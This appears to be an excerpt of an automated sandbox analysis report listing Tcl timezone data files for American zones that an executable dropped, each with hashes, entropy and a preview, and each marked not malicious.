SSDEEP:	24:cQVe5qc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+evIG+M+w+w+jZ+SIrX5:5WP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wo
MD5:	FC299CE2BCD4303BC0F5600111428585
SHA1:	D08B49D8B5E983765F4D3D24359E1896177F7429
SHA-256:	1272363FC2F2AC38F10ED82E0869B2250BA9A29136BBE8EBEF3727CDE4EBF937
SHA-512:	DE2CC7D3EAF987F775437995EEBE663DA0DF952838B701EC15E67BC098337580948983805A00BAEA9E95420C63F53A7443B2F813B67ECAE2C9D86E604946321F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Fortaleza) {. {-9223372036854775808 -9240 0 LMT}. {-1767216360 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -72

C:\Users\user\Desktop\tcl\tzdata\America\Glace_Bay Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8099
Entropy (8bit):	3.737123408653655
Encrypted:	false
SSDEEP:	192:C1V2eXXnqvlrPGgFEUlpde9pXbO53oVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kQ:CDJv
MD5:	3A839112950BFDFD3B5FBD440A2981E4
SHA1:	FFDF034F7E26647D1C18C1F6C49C776AD5BA93ED
SHA-256:	3D0325012AB7076FB31A68E33EE0EABC8556DFA78FBA16A3E41F986D523858FF
SHA-512:	1E06F4F607252C235D2D69E027D7E0510027D8DB0EE49CF291C39D6FD010868EF6899437057DA489DD30981949243DDFA6599FD07CE80E05A1994147B78A76CE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Glace_Bay) {. {-9223372036854775808 -14388 0 LMT}. {-2131646412 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-536443200 -14400 0 AST}. {-526500000 -10800 1 ADT}. {-513198000 -14400 0 AST}. {-504907200 -14400 0 AST}. {63086400 -14400 0 AST}. {73461600 -10800 1 ADT}. {89182800 -14400 0 AST}. {104911200 -10800 1 ADT}. {120632400 -14400 0 AST}. {126244800 -14400 0 AST}. {136360800 -10800 1 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}.

C:\Users\user\Desktop\tcl\tzdata\America\Godthab Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7306
Entropy (8bit):	3.7801111303444968
Encrypted:	false
SSDEEP:	192:zT8l/pRvjwr7p3EbYFKTqoQThBEIfwjocaBhlxJo9udei+P3+/c+qQqarjlZjWuz:fzRLBuvfxhk
MD5:	9DA154CF3D02ABE7BF2656D686FB0009
SHA1:	077CEF531C4176A24C798FD6B132CDFA388F8506
SHA-256:	8D5576049B0B621DB2A112002CD34F38295FA7DB63BACFB462F3A59933491299
SHA-512:	CDAD3B6EC3C3378819BE52117AFA4605C0973555267CBFC97BDFC14A876C964CEA354A0BC8FB1311521046FFCC8842E299004B93794707575AD0A864F8F42E70
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Godthab) {. {-9223372036854775808 -12416 0 LMT}. {-1686083584 -10800 0 WGT}. {323845200 -7200 0 WGST}. {338950800 -10800 0 WGT}. {354675600 -7200 1 WGST}. {370400400 -10800 0 WGT}. {386125200 -7200 1 WGST}. {401850000 -10800 0 WGT}. {417574800 -7200 1 WGST}. {433299600 -10800 0 WGT}. {449024400 -7200 1 WGST}. {465354000 -10800 0 WGT}. {481078800 -7200 1 WGST}. {496803600 -10800 0 WGT}. {512528400 -7200 1 WGST}. {528253200 -10800 0 WGT}. {543978000 -7200 1 WGST}. {559702800 -10800 0 WGT}. {575427600 -7200 1 WGST}. {591152400 -10800 0 WGT}. {606877200 -7200 1 WGST}. {622602000 -10800 0 WGT}. {638326800 -7200 1 WGST}. {654656400 -10800 0 WGT}. {670381200 -7200 1 WGST}. {686106000 -10800 0 WGT}. {701830800 -7200 1 WGST}. {717555600 -10800 0 WGT}. {733280400 -7200 1 WGST}. {749005200 -10800 0 WGT}. {764730000 -7200 1 WGST}. {7804548

C:\Users\user\Desktop\tcl\tzdata\America\Goose_Bay Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10015
Entropy (8bit):	3.780383775128893
Encrypted:	false
SSDEEP:	192:z9zdvd8mSGDcfnrpbXXMqvlrPGgFEUlpd8ESeYPiVFuT/eleWmBk81kS/kV6kefD:z9zdvd7SGgcESeYPiV2Jv
MD5:	77DEEF08876F92042F71E1DEFA666857
SHA1:	7E21B51B3ED8EBEB85193374174C6E2BCA7FEB7F
SHA-256:	87E9C6E265BFA58885FBEC128263D5E5D86CC32B8FFEDECAFE96F773192C18BE
SHA-512:	C9AB8C9147354A388AEC5FE04C6C5317481478A07893461706CDC9FD5B42E31733EAC01C95C357F3C5DC3556C49F20374F58A6E0A120755D5E96744DE3A95A81
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Goose_Bay) {. {-9223372036854775808 -14500 0 LMT}. {-2713895900 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1096921748 -12600 0 NST}. {-1072989000 -12600 0 NST}. {-1061670600 -9000 1 NDT}. {-1048973400 -12600 0 NST}. {-1030221000 -9000 1 NDT}. {-1017523800 -12600 0 NST}. {-998771400 -9000 1 NDT}. {-986074200 -12600 0 NST}. {-966717000 -9000 1 NDT}. {-954624600 -12600 0 NST}. {-935267400 -9000 1 NDT}. {-922570200 -12600 0 NST}. {-903817800 -9000 1 NDT}. {-891120600 -12600 0 NST}. {-872368200 -9000 0 NWT}. {-769395600 -9000 1 NPT}. {-765401400 -12600 0 NST}. {-757369800 -12600 0 NST}. {-746044200 -9000 1 NDT}. {-733347000 -12600 0 NST}. {-714594600 -9000 1 NDT}. {-701897400 -12600 0 NST}. {-683145000 -9000 1 NDT}. {-670447800 -12600 0 NST}. {-6516954

C:\Users\user\Desktop\tcl\tzdata\America\Grand_Turk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7398
Entropy (8bit):	3.7539771468431327
Encrypted:	false
SSDEEP:	96:hfaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:hfrn+qvOTFhPI1jFIL
MD5:	E31A9245677089B667116925548F8EA4
SHA1:	FA077C3A47201161D422E8B1F39CF914EE49EB68
SHA-256:	FF2A5E8CC94B425F1E96F3E11AE462D3D69B055DB95C3C0F706A1E468A830573
SHA-512:	50F288D3D2D1ADA1776ACC724971B0583738B906F38C27E3E241A760C11396840FCA6A7F130DCF6D553F5CAF9395CD13D2D2A469E6F65DD3DE012EF7E20AF827
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Grand_Turk) {. {-9223372036854775808 -17072 0 LMT}. {-2524504528 -18432 0 KMT}. {-1827687168 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {719992800 -18000 0 EST}. {73

C:\Users\user\Desktop\tcl\tzdata\America\Grenada Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	149
Entropy (8bit):	4.9628318832469
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE5QFEXGm2OHtvUdRedVFpPvwvYv:SlSWB9X52905QFLm2OHtGedvpPr
MD5:	5DB4BA5A2D563738350CEC6D96D24942
SHA1:	6DBE2EF9A4C37F96C81A9F4A2A435C79F21AB67D
SHA-256:	405B6F5D432686CE124A52385A6D10F68FEFF483764FF5300BFB4052986EAA7D
SHA-512:	8B1205E4395004A3569482B3328CF04E3BA4144DFFAF1DF4AAED6E3377D41B7AEB5F1372AA00DD9B9E9BD8A80ACC1E91ACD2A6EDB689A54CE8C0ACAA810A0532
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Grenada) {. {-9223372036854775808 -14820 0 LMT}. {-1846266780 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Guadeloupe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.0105116034458
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE5AJLkHkXGm2OHwV4YvUdV5vwvYv:SlSWB9X52905AJLkLm2OHfY+r
MD5:	675B8B4CEEDE88EB4572050B2A21907B
SHA1:	E8A8AB8329DE57E136EC4202898FC791EE18D427
SHA-256:	6B83925B5B259D4D370EBB72D302735D57D0FF5A03A03C00E5EB939CECDC992F
SHA-512:	FA52EED3A75EA3EBAB444D5CE3237C8E60F6F474325253667BF0E8F0EDF8E78D91BBF897884BAC63CAE4CE21BA1FF561E1D1F4C3DAC20047579C12BEA4C410C8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guadeloupe) {. {-9223372036854775808 -14768 0 LMT}. {-1848254032 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Guatemala Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	385
Entropy (8bit):	4.450029420195016
Encrypted:	false
SSDEEP:	12:MBp52906GdJmdHKznI2f/uFn/z/uFn/w67Rd3/uFn/4Bx/uFn/xAQ:cQ8JeQXfSn/zSn/w67Rd3Sn/4HSn/j
MD5:	6E3FD9D19E0CD26275B0F95412F13F4C
SHA1:	A1B6D6219DEBDBC9B5FFF5848E5DF14F8F4B1158
SHA-256:	1DC103227CA0EDEEBA8EE8A41AE54B3E11459E4239DC051B0694CF7DF3636F1A
SHA-512:	BF615D16BB55186AFC7216B47250EE84B7834FD08077E29E0A8F49C65AACAAD8D27539EA751202EBFF5E0B00702EC59B0A7D95F5FB585BFED68AC6206416110D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guatemala) {. {-9223372036854775808 -21724 0 LMT}. {-1617040676 -21600 0 CST}. {123055200 -18000 1 CDT}. {130914000 -21600 0 CST}. {422344800 -18000 1 CDT}. {433054800 -21600 0 CST}. {669708000 -18000 1 CDT}. {684219600 -21600 0 CST}. {1146376800 -18000 1 CDT}. {1159678800 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Guayaquil Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.957616449865346
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE5qJkXGm2OHHjGevX5lH6owsXSicUTpvaPAv:SlSWB9X529056m2OHHjGeP5lahicKpiS
MD5:	2E9AE527CE849A35219EF68F3BECA3AD
SHA1:	6C3D12907122383FED9C6F65D3F38E7D1CE43761
SHA-256:	D9AB34DF36DF3AADA024B093E8F73EAE43B4B56CAF8EFB00D82A518E44979C66
SHA-512:	540DE179EE5D716537C3E7C184CD098A281D59D285A4E5E7733AC28A0F17F644E7F192EFD76DE5D7EEB80D91754D8B2579DCDDC49296AF433CEA10A5EE405F5F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guayaquil) {. {-9223372036854775808 -19160 0 LMT}. {-2524502440 -18840 0 QMT}. {-1230749160 -18000 0 ECT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Guyana Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	237
Entropy (8bit):	4.722702793311002
Encrypted:	false
SSDEEP:	6:SlSWB9X52905R3Lm2OHRjGeTShVy4YiwNUSY6KcVVFLIB/z:MBp5290LLmdHVTiy45NSOc/VG/z
MD5:	8D1F3433552E24E8C97DDE88DFCC070F
SHA1:	992FBE19E858ADDBF228D1FFCF3E2A8ED860CEE0
SHA-256:	619CE2809A31BF685A74F0D54E9433A5557796C73B9337CAB7CC19980352DBAF
SHA-512:	89A80E8744117131854BD65F21F5FDF4BA22C215DD99C0DAD5144F0D01D3C19160085E28293682EF8FEDA8AE244FDA8BA3E3199D233D9B7EAAD4EC6D8A73BBAE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guyana) {. {-9223372036854775808 -13960 0 LMT}. {-1730578040 -13500 0 GBGT}. {-113688900 -13500 0 GYT}. {176010300 -10800 0 GYT}. {662698800 -14400 0 GYT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Halifax Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10763
Entropy (8bit):	3.724988391778253
Encrypted:	false
SSDEEP:	192:Y7Z1hubfVmv0SqJXDiFHrbm96qddObEn/RDzWRfQFQ4XL8vG+81VcfnrpbXXnqvo:823ZLYvuOZJv
MD5:	7DE8E355A725B3D9B3FD06A838B9715F
SHA1:	41C6AAEA03FC7FEED50CFFFC4DFF7F35E2B1C23D
SHA-256:	5F65F38FFA6B05C59B21DB98672EB2124E4283530ACB01B22093EAEFB256D116
SHA-512:	4C61A15DDF28124343C1E6EFE068D15E48F0662534486EC38A4E2731BE085CDA5856F884521EF32A6E0EDD610A8A491A722220BDD1BAF2A9652D8457778AF696
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Halifax) {. {-9223372036854775808 -15264 0 LMT}. {-2131645536 -14400 0 AST}. {-1696276800 -10800 1 ADT}. {-1680469200 -14400 0 AST}. {-1640980800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1609444800 -14400 0 AST}. {-1566763200 -10800 1 ADT}. {-1557090000 -14400 0 AST}. {-1535486400 -10800 1 ADT}. {-1524949200 -14400 0 AST}. {-1504468800 -10800 1 ADT}. {-1493413200 -14400 0 AST}. {-1472414400 -10800 1 ADT}. {-1461963600 -14400 0 AST}. {-1440964800 -10800 1 ADT}. {-1429390800 -14400 0 AST}. {-1409515200 -10800 1 ADT}. {-1396731600 -14400 0 AST}. {-1376856000 -10800 1 ADT}. {-1366491600 -14400 0 AST}. {-1346616000 -10800 1 ADT}. {-1333832400 -14400 0 AST}. {-1313956800 -10800 1 ADT}. {-1303678800 -14400 0 AST}. {-1282507200 -10800 1 ADT}. {-1272661200 -14400 0 AST}. {-1251057600 -10800 1 ADT}. {-1240088400

C:\Users\user\Desktop\tcl\tzdata\America\Havana Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8444
Entropy (8bit):	3.7376582182649556
Encrypted:	false
SSDEEP:	192:VXA0Bc0tTJtNliQ4sxgpuG4c2JPTxUw9Or2ocrPGSyM9Gk4LK4ZMCf7VkXgySCWv:VXA0Bc0tTJtNliQ4sxSuG4c2JPTxUw9m
MD5:	74572530B8D6D99B6FA3FAFB80B1BD54
SHA1:	282F7FB8D70D73B6DB7820982715B3BCC4204831
SHA-256:	1D901D6383B076987519457BB3FEBF284E777E5ECFE940B4E81FC318C86D87B6
SHA-512:	7DE0F5924818399BD90FC123DB1ED3DB68E716CF95021C87A7D07D8CF48D8C7362F8CC5F236B4EA184F58B35D77BEAD0CB69B8077DD73CA02F504C5EB31A074E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Havana) {. {-9223372036854775808 -19768 0 LMT}. {-2524501832 -19776 0 HMT}. {-1402813824 -18000 0 CST}. {-1311534000 -14400 1 CDT}. {-1300996800 -18000 0 CST}. {-933534000 -14400 1 CDT}. {-925675200 -18000 0 CST}. {-902084400 -14400 1 CDT}. {-893620800 -18000 0 CST}. {-870030000 -14400 1 CDT}. {-862171200 -18000 0 CST}. {-775681200 -14400 1 CDT}. {-767822400 -18000 0 CST}. {-744231600 -14400 1 CDT}. {-736372800 -18000 0 CST}. {-144702000 -14400 1 CDT}. {-134251200 -18000 0 CST}. {-113425200 -14400 1 CDT}. {-102542400 -18000 0 CST}. {-86295600 -14400 1 CDT}. {-72907200 -18000 0 CST}. {-54154800 -14400 1 CDT}. {-41457600 -18000 0 CST}. {-21495600 -14400 1 CDT}. {-5774400 -18000 0 CST}. {9954000 -14400 1 CDT}. {25675200 -18000 0 CST}. {41403600 -14400 1 CDT}. {57729600 -18000 0 CST}. {73458000 -14400 1 CDT}. {87364800 -18000 0 CST}.

C:\Users\user\Desktop\tcl\tzdata\America\Hermosillo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	595
Entropy (8bit):	4.2803367804689785
Encrypted:	false
SSDEEP:	12:MBp5290ebmdH5NWw+Ux++vTQtFlvm0tFXtFjV5a:cQBe5gfUT7UFltF9FjV5a
MD5:	9D1A1746614CE2CEE26D066182938CDC
SHA1:	967590403A84E80ED299B8D548A2B37C8EEB21CE
SHA-256:	493DB3E7B56B2E6B266A5C212CD1F75F1E5CF57533DA03BB1C1F2449543B9F48
SHA-512:	DFAE6BC48F2E4B75DD6744AEE57D31D6A6E764D02DCA5731C7B516AD87B9BAB2FEB355A012EC38BDD53008B501B0744953EB7E0677F02B9EAF083D2E66042B37
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Hermosillo) {. {-9223372036854775808 -26632 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {915174000 -25200 0 MST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Indianapolis Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6996
Entropy (8bit):	3.799188069575817
Encrypted:	false
SSDEEP:	96:uRXxWMzJ2eQzURWu3N7sHRwvOTFhP5S+ijFnRaJeaX1eyDt:uRXxWUJ2eQzURWu3NOqvOTFhPI1jFIL
MD5:	154A332C3ACF6D6F358B07D96B91EBD1
SHA1:	FC16E7CBE179B3AB4E0C2A61AB5E0E8C23E50D50
SHA-256:	C0C7964EBF9EA332B46D8B928B52FDE2ED15ED2B25EC664ACD33DA7BF3F987AE
SHA-512:	5831905E1E6C6FA9DD309104B3A2EE476941D6FF159764123A477E2690C697B0F19EDEA0AD0CD3BBBECF96D64DC4B981027439E7865FCB1632661C8539B3BD6C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Indianapolis) {. {-9223372036854775808 -20678 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-900259200 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Knox Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8470
Entropy (8bit):	3.7546412701514034
Encrypted:	false
SSDEEP:	192:AXxr2eQzURWu3Oab9BxXI6X8xYIIOdXkqbfkeTzZSJw5/9/yuvQ+hcr8bYkzbXw6:AXxr2eQzUwu3Oab9BxXI6XUYIIOdXkqv
MD5:	E8AFD9E320A7F4310B413F8086462F31
SHA1:	7BEE624AAC096E9C280B4FC84B0671381C657F6C
SHA-256:	BE74C1765317898834A18617352DF3B2952D69DE4E294616F1554AB95824DAF0
SHA-512:	C76620999A293FA3A93CA4615AB78F19395F12CC08C242F56BFD4C4CAF8BC769DDEBF33FF10F7DA5A3EFD8ED18792362780188636075419014A8C099A897C43C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Knox) {. {-9223372036854775808 -20790 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-725824800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-415818000 -21600 0 CST}.

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Marengo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7037
Entropy (8bit):	3.786429098558221
Encrypted:	false
SSDEEP:	96:FXx3knO559B18XWRh0ksHRwvOTFhP5S+ijFnRaJeaX1eyDt:FXxUnO559B2XWRh0pqvOTFhPI1jFIL
MD5:	456422A0D5BE8FBF5DBD0E75D8650894
SHA1:	737AC21F019A7E89689B9C8B465C8482FF4F403E
SHA-256:	C92D86CACFF85344453E1AFBC124CE11085DE7F6DC52CB4CBE6B89B01D5FE2F3
SHA-512:	372AEBB2F13A50536C36A025881874E5EE3162F0168B71B2083965BECBBFCA3DAC726117D205D708CC2B4F7ABE65CCC2B3FE6625F1403D97001950524D545470
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Marengo) {. {-9223372036854775808 -20723 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-599594400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Petersburg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7364
Entropy (8bit):	3.79636789874872
Encrypted:	false
SSDEEP:	192:pXxS559B2XW6X8x3X3D2D8IOdXkqbfkeTzlbaqvOTFhPI1jFIL:pXxS559B2XW6XU3X3D2D8IOdXkqbfNT2
MD5:	9614153F9471187A2F92B674733369A0
SHA1:	199E8D5018A374EDB9592483CE4DDB30712006E3
SHA-256:	5323EBC8D450CC1B53AED18AD209ADEB3A6EEB5A00A80D63E26DB1C85B6476ED
SHA-512:	2A1E26D711F62C51A5EE7014584FAF41C1780BD62573247D45D467500C6AB9A9EAD5A382A1986A9D768D7BB927E4D391EA1B7A4AD9A54D3B05D8AD2385156C33
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Petersburg) {. {-9223372036854775808 -20947 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-473364000 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-257965200 -21600 0 CST}. {-242236800 -18000 1 CDT}. {-226515600 -21600 0 CST}. {-210787200 -18000 1 CDT}. {-195066000 -21600 0 CST}. {-179337600 -18000 1 CDT}. {-163616400 -21600 0 CST

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Tell_City Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6992
Entropy (8bit):	3.7768650637181533
Encrypted:	false
SSDEEP:	192:CXxjL36559B2XI6XE3X3D2E0bYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3g:CXxjL36559B2XI6XE3X3D2E0bYkzbXw6
MD5:	D0F40504B578D996E93DAE6DA583116A
SHA1:	4D4D24021B826BFED2735D42A46EEC1C9EBEA8E3
SHA-256:	F4A0572288D2073D093A256984A2EFEC6DF585642EA1C4A2860B38341D376BD8
SHA-512:	BA9D994147318FF5A53D45EC432E118B5F349207D58448D568E0DB316452EF9FD620EE4623FD4EAD123BC2A6724E1BAE2809919C58223E6FD4C7A20F004155E0
Malicious:	false
